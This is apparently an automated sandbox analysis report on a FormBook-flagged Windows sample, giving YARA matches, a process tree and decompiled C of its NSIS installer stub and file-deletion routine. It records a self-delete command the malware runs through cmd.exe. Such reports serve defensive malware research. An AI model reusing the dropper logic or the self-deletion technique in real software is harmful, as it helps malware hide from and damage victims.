                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: 5SXTKXCnqS.exe PID: 4328 Parent PID: 5828

                                                                                  General

                                                                                  Start time:17:42:27
                                                                                  Start date:10/06/2021
                                                                                  Path:C:\Users\user\Desktop\5SXTKXCnqS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\5SXTKXCnqS.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:245650 bytes
                                                                                  MD5 hash:CB4947E5C78ADA624D22C28EE9079871
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: explorer.exe PID: 3472 Parent PID: 4328

                                                                                  General

                                                                                  Start time:17:42:31
                                                                                  Start date:10/06/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff693d90000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: msdt.exe PID: 4940 Parent PID: 3472

                                                                                  General

                                                                                  Start time:17:43:03
                                                                                  Start date:10/06/2021
                                                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                                  Imagebase:0x10f0000
                                                                                  File size:1508352 bytes
                                                                                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  Chronological Activities

                                                                                  Analysis Process: cmd.exe PID: 1384 Parent PID: 4940

                                                                                  General

                                                                                  Start time:17:43:06
                                                                                  Start date:10/06/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\5SXTKXCnqS.exe'
                                                                                  Imagebase:0x1f0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: conhost.exe PID: 5388 Parent PID: 1384

                                                                                  General

                                                                                  Start time:17:43:06
                                                                                  Start date:10/06/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >

                                                                                    Analysis Process: 5SXTKXCnqS.exe PID: 5828 Parent PID: 5720 5SXTKXCnqS.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 82%
                                                                                    			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\alfons\\Desktop\\5SXTKXCnqS.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\alfons\\Desktop\\5SXTKXCnqS.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\alfons\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", "C:\\Users\\alfons\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\5SXTKXCnqS.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                                                                                    0x00403248
                                                                                    0x0040324c
                                                                                    0x00403254
                                                                                    0x00403256
                                                                                    0x0040325b
                                                                                    0x00403266
                                                                                    0x0040326d
                                                                                    0x00403275
                                                                                    0x0040327f
                                                                                    0x00403295
                                                                                    0x004032a5
                                                                                    0x004032aa
                                                                                    0x004032b0
                                                                                    0x004032b7
                                                                                    0x004032ca
                                                                                    0x004032cf
                                                                                    0x004032d1
                                                                                    0x004032d3
                                                                                    0x004032d8
                                                                                    0x004032d8
                                                                                    0x004032e8
                                                                                    0x004032ee
                                                                                    0x00403357
                                                                                    0x00403357
                                                                                    0x00403359
                                                                                    0x0040335b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004032f4
                                                                                    0x004032f7
                                                                                    0x004032ff
                                                                                    0x004032ff
                                                                                    0x00403302
                                                                                    0x00403307
                                                                                    0x00403309
                                                                                    0x00403309
                                                                                    0x0040330a
                                                                                    0x0040330a
                                                                                    0x0040330f
                                                                                    0x00403312
                                                                                    0x00403347
                                                                                    0x0040334c
                                                                                    0x00403351
                                                                                    0x00403354
                                                                                    0x00403356
                                                                                    0x00403356
                                                                                    0x00403356
                                                                                    0x00000000
                                                                                    0x00403314
                                                                                    0x00403314
                                                                                    0x00403315
                                                                                    0x00403318
                                                                                    0x00403320
                                                                                    0x00403323
                                                                                    0x00403325
                                                                                    0x00403325
                                                                                    0x00403325
                                                                                    0x00403323
                                                                                    0x00403328
                                                                                    0x0040332e
                                                                                    0x00403336
                                                                                    0x00403339
                                                                                    0x0040333b
                                                                                    0x0040333b
                                                                                    0x0040333b
                                                                                    0x00403339
                                                                                    0x0040333e
                                                                                    0x00403345
                                                                                    0x0040335f
                                                                                    0x00403362
                                                                                    0x0040336b
                                                                                    0x00403370
                                                                                    0x00403370
                                                                                    0x0040337b
                                                                                    0x00403381
                                                                                    0x00403386
                                                                                    0x00403388
                                                                                    0x004033aa
                                                                                    0x004033af
                                                                                    0x004033b6
                                                                                    0x004033bd
                                                                                    0x004033c1
                                                                                    0x00403428
                                                                                    0x00403428
                                                                                    0x0040342d
                                                                                    0x00403437
                                                                                    0x00403522
                                                                                    0x00403528
                                                                                    0x00403533
                                                                                    0x0040353c
                                                                                    0x0040353e
                                                                                    0x00403543
                                                                                    0x00403545
                                                                                    0x00403547
                                                                                    0x00403549
                                                                                    0x0040354b
                                                                                    0x0040354d
                                                                                    0x0040354f
                                                                                    0x0040355f
                                                                                    0x00403561
                                                                                    0x00403563
                                                                                    0x00403570
                                                                                    0x0040357f
                                                                                    0x00403587
                                                                                    0x0040358f
                                                                                    0x0040358f
                                                                                    0x00403563
                                                                                    0x0040354f
                                                                                    0x0040354b
                                                                                    0x00403594
                                                                                    0x0040359a
                                                                                    0x0040359c
                                                                                    0x004035a0
                                                                                    0x004035a0
                                                                                    0x0040359c
                                                                                    0x004035a5
                                                                                    0x004035aa
                                                                                    0x004035ad
                                                                                    0x004035af
                                                                                    0x004035af
                                                                                    0x004035b7
                                                                                    0x004035b7
                                                                                    0x00403446
                                                                                    0x0040344d
                                                                                    0x0040344d
                                                                                    0x004033c9
                                                                                    0x00403418
                                                                                    0x00403418
                                                                                    0x00403424
                                                                                    0x00000000
                                                                                    0x00403424
                                                                                    0x004033d2
                                                                                    0x004033df
                                                                                    0x004033d6
                                                                                    0x004033dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004033de
                                                                                    0x004033de
                                                                                    0x004033de
                                                                                    0x004033e3
                                                                                    0x004033e5
                                                                                    0x004033ed
                                                                                    0x00403459
                                                                                    0x0040346d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403471
                                                                                    0x00403478
                                                                                    0x0040347e
                                                                                    0x00403484
                                                                                    0x0040348c
                                                                                    0x0040348c
                                                                                    0x0040349a
                                                                                    0x004034a1
                                                                                    0x004034aa
                                                                                    0x004034b0
                                                                                    0x004034bc
                                                                                    0x004034c2
                                                                                    0x004034cc
                                                                                    0x004034e0
                                                                                    0x004034e1
                                                                                    0x004034e2
                                                                                    0x004034f3
                                                                                    0x004034f9
                                                                                    0x00403500
                                                                                    0x00403503
                                                                                    0x00403509
                                                                                    0x00403509
                                                                                    0x00403500
                                                                                    0x0040350d
                                                                                    0x00403513
                                                                                    0x00403513
                                                                                    0x00403516
                                                                                    0x00403517
                                                                                    0x00403518
                                                                                    0x00000000
                                                                                    0x00403518
                                                                                    0x004033ef
                                                                                    0x004033f1
                                                                                    0x004033fc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403404
                                                                                    0x0040340f
                                                                                    0x00403414
                                                                                    0x00000000
                                                                                    0x00403414
                                                                                    0x00403390
                                                                                    0x0040339c
                                                                                    0x004033a1
                                                                                    0x004033a6
                                                                                    0x004033a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004033a8
                                                                                    0x00000000
                                                                                    0x00403345
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004032f9
                                                                                    0x004032f9
                                                                                    0x004032f9
                                                                                    0x004032fa
                                                                                    0x004032fa
                                                                                    0x00000000
                                                                                    0x004032f9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • #17.COMCTL32 ref: 0040325B
                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                      • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                      • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                      • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                    • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                      • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                    • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000000), ref: 004032BD
                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000020), ref: 004032E8
                                                                                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                    • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                    • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                    • ExitProcess.KERNEL32 ref: 0040344D
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000000,00000000), ref: 00403459
                                                                                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000000,00000000), ref: 00403465
                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                    • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\5SXTKXCnqS.exe,0041F058,00000001), ref: 004034D6
                                                                                    • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                    • ExitWindowsEx.USER32 ref: 00403594
                                                                                    • ExitProcess.KERNEL32 ref: 004035B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                    • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\5SXTKXCnqS.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5SXTKXCnqS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                    • API String ID: 2278157092-2851510690
                                                                                    • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                    • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                    • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                    • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                    0x00405496
                                                                                    0x0040549a
                                                                                    0x004054a3
                                                                                    0x004054a6
                                                                                    0x004054a9
                                                                                    0x004054b1
                                                                                    0x004054b3
                                                                                    0x004054b4
                                                                                    0x00000000
                                                                                    0x004054b4
                                                                                    0x004054c3
                                                                                    0x004054c3
                                                                                    0x004054c6
                                                                                    0x004054c9
                                                                                    0x004054dd
                                                                                    0x004054e4
                                                                                    0x004054e9
                                                                                    0x004054eb
                                                                                    0x004054fb
                                                                                    0x004054ed
